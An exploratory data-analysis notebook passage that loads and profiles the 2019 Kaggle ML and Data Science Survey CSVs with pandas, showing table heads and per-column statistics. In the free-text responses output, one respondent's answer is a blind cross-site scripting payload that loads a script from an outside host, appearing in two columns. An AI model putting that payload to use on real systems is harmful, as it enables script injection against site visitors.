Q4,object,0,0.0,"[0, 23439, What is the highest level of formal...","[9, 1, 1, 1]",4,33.33
Q40,object,0,0.0,"[0, 15880, Which better demonstrates expertise...","[9, 1, 1, 1]",4,33.33
Q41,object,0,0.0,"[0, 1, 14937, How do you perceive the importan...","[9, 1, 1, 1]",4,33.33
Q42,object,0,0.0,"[0, 1, 13584, What metrics do you or your orga...","[7, 3, 1, 1]",4,33.33
Q43,object,0,0.0,"[0, 1, Approximately what percent of your data...","[7, 3, 1, 1]",4,33.33
Q44,object,0,0.0,"[0, 1, What do you find most difficult about e...","[7, 3, 1, 1]",4,33.33
Q45,object,0,0.0,"[0, 1, In what circumstances would you explore...","[7, 3, 1, 1]",4,33.33
Q46,object,0,0.0,"[0, 1, Approximately what percent of your data...","[7, 3, 1, 1]",4,33.33
Q47,object,0,0.0,"[0, 1, 13418, What methods do you prefer for e...","[7, 3, 1, 1]",4,33.33
Q48,object,0,0.0,"[0, 1, Do you consider ML models to be ""black ...","[7, 3, 1, 1]",4,33.33
Q49,object,0,0.0,"[0, 1, What tools and methods do you use to ma...","[7, 3, 1, 1]",4,33.33
Q5,object,0,0.0,"[0, 1, 22948, Which best describes your underg...","[8, 2, 1, 1]",4,33.33
Q50,object,0,0.0,"[0, 1, 12814, What barriers prevent you from m...","[7, 3, 1, 1]",4,33.33
Q6,object,0,0.0,"[0, 1, Select the title most similar to your c...","[8, 2, 1, 1]",4,33.33
Q7,object,0,0.0,"[0, 1, 21686, In what industry is your current...","[8, 2, 1, 1]",4,33.33
Q8,object,0,0.0,"[0, 1, How many years of experience do you hav...","[8, 2, 1, 1]",4,33.33
Q9,object,0,0.0,"[0, 1, What is your current yearly compensatio...","[8, 2, 1, 1]",4,33.33
Time from Start to Finish (seconds),object,0,0.0,"[0, 23860, Duration (in seconds)]","[10, 1, 1]",3,25.00

## Load the 2109 Kaggle survey data <a class="anchor" id="load-bullet"></a>

In [49]:
df_qo_2019 = pd.read_csv('~/data/kaggle-survey/kaggle-survey-2019/questions_only.csv', encoding="ISO-8859-1", low_memory=False)
df_mc_2019 = pd.read_csv('~/data/kaggle-survey/kaggle-survey-2019/multiple_choice_responses.csv', encoding="ISO-8859-1", low_memory=False)
df_otr_2019 = pd.read_csv('~/data/kaggle-survey/kaggle-survey-2019/other_text_responses.csv', encoding="ISO-8859-1", low_memory=False)
df_ss_2019 = pd.read_csv('~/data/kaggle-survey/kaggle-survey-2019/survey_schema.csv', encoding="ISO-8859-1", low_memory=False)

## Understand the data  <a class="anchor" id="understand-bullet"></a>  
[TOC](#toc)

### Questions Only
____

In [42]:
df_qo_2019.head()

,Time from Start to Finish (seconds),Q1,Q2,Q3,Q4,Q5,Q6,Q7,Q8,Q9,...,Q25,Q26,Q27,Q28,Q29,Q30,Q31,Q32,Q33,Q34
0,Duration (in seconds),What is your age (# years)?,What is your gender? - Selected Choice,In which country do you currently reside?,What is the highest level of formal education ...,Select the title most similar to your current ...,What is the size of the company where you are ...,Approximately how many individuals are respons...,Does your current employer incorporate machine...,Select any activities that make up an importan...,...,Which categories of ML tools do you use on a r...,Which categories of computer vision methods do...,Which of the following natural language proces...,Which of the following machine learning framew...,Which of the following cloud computing platfor...,Which specific cloud computing products do you...,Which specific big data / analytics products d...,Which of the following machine learning produc...,Which automated machine learning tools (or par...,Which of the following relational database pro...

In [43]:
num_rows, num_cols, num_nans, df_freeform_info = get_dataframe_info(df_qo_2019)
print('number of rows:', num_rows)
print('number of columns:', num_cols)
print('number of nans:', num_nans)
display(df_freeform_info)

number of rows: 1
number of columns: 35
number of nans: 0

,dtype,num_nans,pct_nans,data_range,data_range_count,num_unique,pct_unique
name,,,,,,,
Time from Start to Finish (seconds),object,0,0.0,[Duration (in seconds)],[1],1,100.0
Q1,object,0,0.0,[What is your age (# years)?],[1],1,100.0
Q2,object,0,0.0,[What is your gender? - Selected Choice],[1],1,100.0
Q3,object,0,0.0,[In which country do you currently reside?],[1],1,100.0
Q4,object,0,0.0,[What is the highest level of formal education...,[1],1,100.0
Q5,object,0,0.0,[Select the title most similar to your current...,[1],1,100.0
Q6,object,0,0.0,[What is the size of the company where you are...,[1],1,100.0
Q7,object,0,0.0,[Approximately how many individuals are respon...,[1],1,100.0
Q8,object,0,0.0,[Does your current employer incorporate machin...,[1],1,100.0
Q9,object,0,0.0,[Select any activities that make up an importa...,[1],1,100.0
Q10,object,0,0.0,[What is your current yearly compensation (app...,[1],1,100.0
Q11,object,0,0.0,[Approximately how much money have you spent o...,[1],1,100.0
Q12,object,0,0.0,[Who/what are your favorite media sources that...,[1],1,100.0
Q13,object,0,0.0,[On which platforms have you begun or complete...,[1],1,100.0
Q14,object,0,0.0,[What is the primary tool that you use at work...,[1],1,100.0
Q15,object,0,0.0,[How long have you been writing code to analyz...,[1],1,100.0
Q16,object,0,0.0,[Which of the following integrated development...,[1],1,100.0
Q17,object,0,0.0,[Which of the following hosted notebook produc...,[1],1,100.0
Q18,object,0,0.0,[What programming languages do you use on a re...,[1],1,100.0
Q19,object,0,0.0,[What programming language would you recommend...,[1],1,100.0
Q20,object,0,0.0,[What data visualization libraries or tools do...,[1],1,100.0
Q21,object,0,0.0,[Which types of specialized hardware do you us...,[1],1,100.0
Q22,object,0,0.0,[Have you ever used a TPU (tensor processing u...,[1],1,100.0
Q23,object,0,0.0,[For how many years have you used machine lear...,[1],1,100.0
Q24,object,0,0.0,[Which of the following ML algorithms do you u...,[1],1,100.0
Q25,object,0,0.0,[Which categories of ML tools do you use on a ...,[1],1,100.0
Q26,object,0,0.0,[Which categories of computer vision methods d...,[1],1,100.0
Q27,object,0,0.0,[Which of the following natural language proce...,[1],1,100.0
Q28,object,0,0.0,[Which of the following machine learning frame...,[1],1,100.0
Q29,object,0,0.0,[Which of the following cloud computing platfo...,[1],1,100.0
Q30,object,0,0.0,[Which specific cloud computing products do yo...,[1],1,100.0
Q31,object,0,0.0,[Which specific big data / analytics products ...,[1],1,100.0
Q32,object,0,0.0,[Which of the following machine learning produ...,[1],1,100.0
Q33,object,0,0.0,[Which automated machine learning tools (or pa...,[1],1,100.0
Q34,object,0,0.0,[Which of the following relational database pr...,[1],1,100.0

### Multiple Choice
____

In [44]:
df_mc_2019.head()

,Time from Start to Finish (seconds),Q1,Q2,Q2_OTHER_TEXT,Q3,Q4,Q5,Q5_OTHER_TEXT,Q6,Q7,...,Q34_Part_4,Q34_Part_5,Q34_Part_6,Q34_Part_7,Q34_Part_8,Q34_Part_9,Q34_Part_10,Q34_Part_11,Q34_Part_12,Q34_OTHER_TEXT
0,Duration (in seconds),What is your age (# years)?,What is your gender? - Selected Choice,What is your gender? - Prefer to self-describe...,In which country do you currently reside?,What is the highest level of formal education ...,Select the title most similar to your current ...,Select the title most similar to your current ...,What is the size of the company where you are ...,Approximately how many individuals are respons...,...,Which of the following relational database pro...,Which of the following relational database pro...,Which of the following relational database pro...,Which of the following relational database pro...,Which of the following relational database pro...,Which of the following relational database pro...,Which of the following relational database pro...,Which of the following relational database pro...,Which of the following relational database pro...,Which of the following relational database pro...
1,510,22-24,Male,-1,France,Masterâs degree,Software Engineer,-1,"1000-9,999 employees",0,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,-1
2,423,40-44,Male,-1,India,Professional degree,Software Engineer,-1,"> 10,000 employees",20+,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,-1
3,83,55-59,Female,-1,Germany,Professional degree,NaN,-1,NaN,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,-1
4,391,40-44,Male,-1,Australia,Masterâs degree,Other,0,"> 10,000 employees",20+,...,NaN,NaN,NaN,NaN,NaN,Azure SQL Database,NaN,NaN,NaN,-1

In [45]:
num_rows, num_cols, num_nans, df_mchoice_info = get_dataframe_info(df_mc_2019)
print('number of rows:', num_rows)
print('number of columns:', num_cols)
print('number of nans:', num_nans)
display(df_mchoice_info)

number of rows: 19718
number of columns: 246
number of nans: 3594883

,dtype,num_nans,pct_nans,data_range,data_range_count,num_unique,pct_unique
name,,,,,,,
Time from Start to Finish (seconds),object,0,0.00,"[450, 434, 398, 462, 335, 467, 452, 391, 436, ...","[42, 39, 36, 36, 34, 34, 34, 34, 33, 33, 33, 3...",4169,21.14
Q1,object,0,0.00,"[25-29, 22-24, 30-34, 18-21, 35-39, 40-44, 45-...","[4458, 3610, 3120, 2502, 2087, 1439, 949, 692,...",12,0.06
Q2,object,0,0.00,"[Male, Female, Prefer not to say, Prefer to se...","[16138, 3212, 318, 49, 1]",5,0.03
Q2_OTHER_TEXT,object,0,0.00,"[-1, 0, 9, 1, 35, 39, 31, 42, 28, 22, 25, 27, ...","[19668, 4, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,...",46,0.23
Q3,object,0,0.00,"[India, United States of America, Other, Brazi...","[4786, 3085, 1054, 728, 673, 626, 574, 531, 48...",60,0.30
...,...,...,...,...,...,...,...
Q34_Part_9,object,19238,97.57,"[Azure SQL Database, Which of the following re...","[479, 1]",3,0.02
Q34_Part_10,object,19191,97.33,"[Google Cloud SQL, Which of the following rela...","[526, 1]",3,0.02
Q34_Part_11,object,18472,93.68,"[None, Which of the following relational datab...","[1245, 1]",3,0.02
Q34_Part_12,object,19430,98.54,"[Other, Which of the following relational data...","[287, 1]",3,0.02
Q34_OTHER_TEXT,object,0,0.00,"[-1, 3, 17, 35, 6, 52, 10, 4, 28, 30, 124, 58,...","[19462, 18, 17, 15, 12, 7, 6, 6, 5, 5, 4, 4, 3...",147,0.75

### Other Text Responses

In [50]:
df_otr_2019.head()

,Q12_OTHER_TEXT,Q13_OTHER_TEXT,Q14_OTHER_TEXT,Q14_Part_1_TEXT,Q14_Part_2_TEXT,Q14_Part_3_TEXT,Q14_Part_4_TEXT,Q14_Part_5_TEXT,Q16_OTHER_TEXT,Q17_OTHER_TEXT,...,Q28_OTHER_TEXT,Q29_OTHER_TEXT,Q2_OTHER_TEXT,Q30_OTHER_TEXT,Q31_OTHER_TEXT,Q32_OTHER_TEXT,Q33_OTHER_TEXT,Q34_OTHER_TEXT,Q5_OTHER_TEXT,Q9_OTHER_TEXT
0,Who/what are your favorite media sources that ...,On which platforms have you begun or completed...,What is the primary tool that you use at work ...,What is the primary tool that you use at work ...,What is the primary tool that you use at work ...,What is the primary tool that you use at work ...,What is the primary tool that you use at work ...,What is the primary tool that you use at work ...,Which of the following integrated development ...,Which of the following hosted notebook product...,...,Which of the following machine learning framew...,Which of the following cloud computing platfor...,What is your gender? - Prefer to self-describe...,Which specific cloud computing products do you...,Which specific big data / analytics products d...,Which of the following machine learning produc...,Which automated machine learning tools (or par...,Which of the following relational database pro...,Select the title most similar to your current ...,Select any activities that make up an importan...
1,"""><script src=https://abels.xss.ht></script>",NaN,NaN,Sheets,NaN,NaN,NaN,NaN,NaN,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,"""><script src=https://abels.xss.ht></script>"
2,NaN,NaN,NaN,Microsoft Excel,NaN,NaN,NaN,NaN,NaN,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
3,NaN,NaN,NaN,D,NaN,NaN,NaN,NaN,NaN,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
4,NaN,NaN,NaN,Microsoft Excel,NaN,NaN,NaN,NaN,NaN,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN

In [51]:
num_rows, num_cols, num_nans, df_otr_info = get_dataframe_info(df_or_2019)
print('number of rows:', num_rows)
print('number of columns:', num_cols)
print('number of nans:', num_nans)
display(df_otr_info)

number of rows: 19718
number of columns: 28
number of nans: 528388

,dtype,num_nans,pct_nans,data_range,data_range_count,num_unique,pct_unique
name,,,,,,,
Q12_OTHER_TEXT,object,18933,96.02,"[LinkedIn, Medium, Coursera, Linkedin, Books, ...","[39, 38, 16, 16, 14, 11, 11, 9, 8, 7, 7, 6, 6,...",495,2.51
Q13_OTHER_TEXT,object,18497,93.81,"[mlcourse.ai, NPTEL, Youtube, Simplilearn, Plu...","[35, 23, 22, 18, 17, 14, 12, 12, 11, 10, 10, 1...",817,4.14
Q14_OTHER_TEXT,object,18538,94.02,"[Python, python, None, Matlab, none, R, SQL, m...","[89, 45, 36, 28, 22, 13, 13, 11, 11, 9, 8, 7, ...",767,3.89
Q14_Part_1_TEXT,object,16657,84.48,"[Excel, Microsoft Excel, excel, MS Excel, Goog...","[865, 392, 263, 67, 61, 44, 38, 33, 27, 25, 25...",938,4.76
Q14_Part_2_TEXT,object,18822,95.46,"[SAS, SPSS, R, spss, Spss, Python, Sas, Stata,...","[129, 116, 60, 34, 25, 21, 18, 15, 14, 11, 11,...",369,1.87
Q14_Part_3_TEXT,object,18836,95.53,"[Tableau, Power BI, tableau, PowerBI, Salesfor...","[260, 71, 51, 23, 19, 16, 10, 9, 8, 6, 6, 6, 5...",340,1.72
Q14_Part_4_TEXT,object,11246,57.03,"[JupyterLab, Jupyter, RStudio, Python, Jupyter...","[943, 602, 516, 301, 275, 225, 184, 183, 170, ...",2844,14.42
Q14_Part_5_TEXT,object,18530,93.98,"[AWS, GCP, Azure, aws, Aws, Google Colab, Data...","[203, 134, 87, 40, 26, 25, 17, 15, 12, 11, 11,...",489,2.48
Q16_OTHER_TEXT,object,19081,96.77,"[Eclipse, IntelliJ, Intellij, eclipse, SAS, Go...","[47, 17, 14, 13, 11, 11, 10, 9, 9, 8, 6, 6, 6,...",359,1.82
Q17_OTHER_TEXT,object,19403,98.40,"[Databricks, databricks, Github, Anaconda, Zep...","[43, 12, 12, 8, 5, 5, 4, 4, 3, 3, 3, 3, 3, 2, ...",211,1.07
Q18_OTHER_TEXT,object,18621,94.44,"[C#, Scala, SAS, Julia, PHP, VBA, Go, c#, Ruby...","[198, 100, 79, 46, 43, 30, 27, 27, 27, 20, 15,...",308,1.56
Q19_OTHER_TEXT,object,19595,99.38,"[Julia, Scala, C#, SAS, Octave, Swift, julia, ...","[22, 9, 6, 4, 4, 4, 2, 2, 2, 2, 1, 1, 1, 1, 1,...",77,0.39
Q20_OTHER_TEXT,object,19317,97.97,"[Tableau, Excel, MATLAB, Power BI, Pandas, tab...","[31, 13, 12, 10, 8, 6, 5, 5, 4, 4, 4, 3, 3, 3,...",268,1.36
Q21_OTHER_TEXT,object,19652,99.67,"[FPGA, Laptop, Fpga, EMR spark cluster , Micro...","[7, 4, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ...",57,0.29
Q24_OTHER_TEXT,object,19378,98.28,"[SVM, Support Vector Machines, KNN, Clustering...","[32, 11, 7, 6, 4, 4, 4, 4, 3, 2, 2, 2, 2, 2, 2...",262,1.33
Q25_OTHER_TEXT,object,19577,99.28,"[DataRobot, catalyst, Catalyst, sklearn, Micro...","[12, 7, 6, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1,...",116,0.59
Q26_OTHER_TEXT,object,19680,99.81,"[Tracking , I generally build my own neural ne...","[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ...",39,0.20
Q27_OTHER_TEXT,object,19684,99.83,"[SpaCy, Retrofitting, play with word2vec priva...","[2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ...",34,0.17
Q28_OTHER_TEXT,object,19428,98.53,"[Catboost, CatBoost, catboost, h2o, H2O, MATLA...","[24, 14, 13, 11, 10, 9, 6, 4, 4, 4, 4, 4, 4, 4...",165,0.84
Q29_OTHER_TEXT,object,19584,99.32,"[Digital Ocean, DigitalOcean, Tencent Cloud, p...","[5, 4, 3, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 1, ...",116,0.59
Q2_OTHER_TEXT,object,19668,99.75,"[non-binary, Attack Helicopter, bionicle, king...","[4, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ...",46,0.23
Q30_OTHER_TEXT,object,19534,99.07,"[IBM Cloud, Databricks, AWS EMR, AWS SageMaker...","[7, 6, 4, 4, 3, 3, 3, 2, 2, 2, 2, 2, 2, 2, 2, ...",146,0.74
Q31_OTHER_TEXT,object,19529,99.04,"[Snowflake, SAS, Cloudera, DataRobot, Hadoop, ...","[13, 6, 4, 4, 4, 4, 3, 3, 3, 2, 2, 2, 2, 2, 2,...",145,0.74
Q32_OTHER_TEXT,object,19545,99.12,"[DataRobot, Knime, KNIME, IBM Watson Studio, A...","[15, 11, 8, 7, 4, 4, 3, 3, 3, 3, 3, 3, 2, 2, 2...",111,0.56
Q33_OTHER_TEXT,object,19628,99.54,"[IBM AutoAI, Prevision.io, H2O AutoML, H20 Aut...","[6, 4, 3, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, ...",77,0.39
Q34_OTHER_TEXT,object,19462,98.70,"[Snowflake, DB2, MongoDB, Teradata, IBM DB2, S...","[18, 17, 15, 12, 7, 6, 6, 5, 5, 4, 4, 3, 3, 3,...",147,0.75
Q5_OTHER_TEXT,object,18384,93.23,"[Professor, Machine Learning Engineer, Teacher...","[43, 32, 19, 19, 14, 13, 13, 12, 11, 11, 11, 1...",881,4.47
Q9_OTHER_TEXT,object,19579,99.30,"[Write A.I. software, Educate data science fie...","[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ...",140,0.71

### Schema

In [46]:
df_ss_2019.head()

,2019 Kaggle Machine Learning and Data Science Survey,Q1,Q10,Q11,Q12,Q13,Q14,Q15,Q16,Q17,...,Q31,Q32,Q33,Q34,Q4,Q5,Q6,Q7,Q8,Q9
0,Question:,What is your age (# years)?,What is your current yearly compensation (appr...,Approximately how much money have you spent on...,Who/what are your favorite media sources that ...,On which platforms have you begun or completed...,What is the primary tool that you use at work ...,How long have you been writing code to analyze...,Which of the following integrated development ...,Which of the following hosted notebook product...,...,Which specific big data / analytics products d...,Which of the following machine learning produc...,Which automated machine learning tools (or par...,Which of the following relational database pro...,What is the highest level of formal education ...,Select the title most similar to your current ...,What is the size of the company where you are ...,Approximately how many individuals are respons...,Does your current employer incorporate machine...,Select any activities that make up an importan...
1,# of Respondents:,19717,12497,12250,16781,16569,15690,15627,14627,14443,...,7078,7050,7015,6994,19323,19107,14002,13623,13227,9226
2,Who was excluded? (0 = not excluded; 1 = exclu...,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
3,IfÂ What is your age (# years)?Â 0-17Â Is Sele...,0,1,1,1,1,1,1,1,1,...,1,1,1,1,1,1,1,1,1,1
4,IfÂ Select the title most similar to your curr...,0,1,1,0,0,0,0,0,0,...,0,0,0,0,0,0,1,1,1,1

In [47]:
num_rows, num_cols, num_nans, df_schema_info = get_dataframe_info(df_ss_2019)
print('number of rows:', num_rows)
print('number of columns:', num_cols)
print('number of nans:', num_nans)
display(df_schema_info)

number of rows: 10
number of columns: 35
number of nans: 0

,dtype,num_nans,pct_nans,data_range,data_range_count,num_unique,pct_unique
name,,,,,,,
2019 Kaggle Machine Learning and Data Science Survey,object,0,0.0,[Who was excluded? (0 = not excluded; 1 = excl...,"[1, 1, 1, 1, 1, 1, 1, 1, 1, 1]",10,100.0
Q1,object,0,0.0,"[0, What is your age (# years)?, 19717]","[8, 1, 1]",3,30.0
Q10,object,0,0.0,"[0, 1, What is your current yearly compensatio...","[6, 2, 1, 1]",4,40.0
Q11,object,0,0.0,"[0, 1, Approximately how much money have you s...","[6, 2, 1, 1]",4,40.0
Q12,object,0,0.0,"[0, 1, Who/what are your favorite media source...","[7, 1, 1, 1]",4,40.0
Q13,object,0,0.0,"[0, On which platforms have you begun or compl...","[7, 1, 1, 1]",4,40.0
Q14,object,0,0.0,"[0, What is the primary tool that you use at w...","[7, 1, 1, 1]",4,40.0
Q15,object,0,0.0,"[0, How long have you been writing code to ana...","[7, 1, 1, 1]",4,40.0
Q16,object,0,0.0,"[0, 1, 14627, Which of the following integrate...","[6, 2, 1, 1]",4,40.0
Q17,object,0,0.0,"[0, 1, Which of the following hosted notebook ...","[6, 2, 1, 1]",4,40.0
Q18,object,0,0.0,"[0, 1, What programming languages do you use o...","[6, 2, 1, 1]",4,40.0
Q19,object,0,0.0,"[0, 1, 14377, What programming language would ...","[6, 2, 1, 1]",4,40.0
Q2,object,0,0.0,"[0, 19717, What is your gender? - Selected Cho...","[7, 1, 1, 1]",4,40.0
Q20,object,0,0.0,"[0, 1, 14253, What data visualization librarie...","[6, 2, 1, 1]",4,40.0
Q21,object,0,0.0,"[0, 1, Which types of specialized hardware do ...","[6, 2, 1, 1]",4,40.0
Q22,object,0,0.0,"[0, 1, Have you ever used a TPU (tensor proces...","[6, 2, 1, 1]",4,40.0
Q23,object,0,0.0,"[0, 1, For how many years have you used machin...","[6, 2, 1, 1]",4,40.0
Q24,object,0,0.0,"[0, 1, Which of the following ML algorithms do...","[6, 2, 1, 1]",4,40.0
Q25,object,0,0.0,"[0, 1, 13915, Which categories of ML tools do ...","[6, 2, 1, 1]",4,40.0
Q26,object,0,0.0,"[0, 1, 5492, Which categories of computer visi...","[5, 3, 1, 1]",4,40.0
Q27,object,0,0.0,"[0, 1, 3582, Which of the following natural la...","[5, 3, 1, 1]",4,40.0
Q28,object,0,0.0,"[0, 1, 13753, Which of the following machine l...","[6, 2, 1, 1]",4,40.0
Q29,object,0,0.0,"[0, 1, Which of the following cloud computing ...","[5, 3, 1, 1]",4,40.0
Q3,object,0,0.0,"[0, 19717, In which country do you currently r...","[7, 1, 1, 1]",4,40.0
Q30,object,0,0.0,"[0, 1, 7100, Which specific cloud computing pr...","[5, 3, 1, 1]",4,40.0
Q31,object,0,0.0,"[0, 1, 7078, Which specific big data / analyti...","[5, 3, 1, 1]",4,40.0
Q32,object,0,0.0,"[0, 1, Which of the following machine learning...","[5, 3, 1, 1]",4,40.0
Q33,object,0,0.0,"[0, 1, 7015, Which automated machine learning ...","[5, 3, 1, 1]",4,40.0
Q34,object,0,0.0,"[0, 1, 6994, Which of the following relational...","[5, 3, 1, 1]",4,40.0
Q4,object,0,0.0,"[0, 1, What is the highest level of formal edu...","[7, 1, 1, 1]",4,40.0
Q5,object,0,0.0,"[0, Select the title most similar to your curr...","[7, 1, 1, 1]",4,40.0
Q6,object,0,0.0,"[0, 1, What is the size of the company where y...","[6, 2, 1, 1]",4,40.0
Q7,object,0,0.0,"[0, 1, 13623, Approximately how many individua...","[6, 2, 1, 1]",4,40.0
Q8,object,0,0.0,"[0, 1, Does your current employer incorporate ...","[6, 2, 1, 1]",4,40.0
Q9,object,0,0.0,"[0, 1, 9226, Select any activities that make u...","[5, 3, 1, 1]",4,40.0